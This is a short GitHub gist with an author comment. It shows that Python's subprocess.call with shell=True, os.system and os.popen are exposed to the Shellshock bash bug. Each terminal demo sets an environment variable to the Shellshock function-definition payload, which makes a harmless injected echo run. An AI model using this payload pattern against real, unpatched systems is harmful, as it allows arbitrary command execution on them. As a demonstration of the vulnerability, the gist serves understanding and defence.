Skip to content

Instantly share code, notes, and snippets.

@zbuc

zbuc/python shellshock

Created September 25, 2014 23:27
Show Gist options
  • Save zbuc/4591dbe8b2bac36552e7 to your computer and use it in GitHub Desktop.
Save zbuc/4591dbe8b2bac36552e7 to your computer and use it in GitHub Desktop.
Download ZIP
Python shellshock example
Raw
python shellshock
# python subprocess calls using shell=True
# are vulnerable to shellshock...
bash-3.2$ cat test.py
#!/usr/bin/env python
import subprocess
subprocess.call(["/bin/ls"], shell=True)
bash-3.2$ python test.py
hax.txt test.py
bash-3.2$ lol='() { :;}; echo "haha"' python test.py
haha
hax.txt test.py
@zbuc
Copy link
Author

zbuc commented Sep 25, 2014

os.system and os.popen will also invoke the default system shell...

bash-3.2$ cat test3.py
#!/usr/bin/env python

import os

os.system("/bin/ls")

bash-3.2$ lol='() { :;}; echo "haha"' python test3.py
haha
hax.txt     test.py     test2.py    test3.py    test4.py

bash-3.2$ cat test4.py
#!/usr/bin/env python

import os

print os.popen("/bin/ls").read()

bash-3.2$ lol='() { :;}; echo "haha"' python test4.py
haha
hax.txt
test.py
test2.py
test3.py
test4.py

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment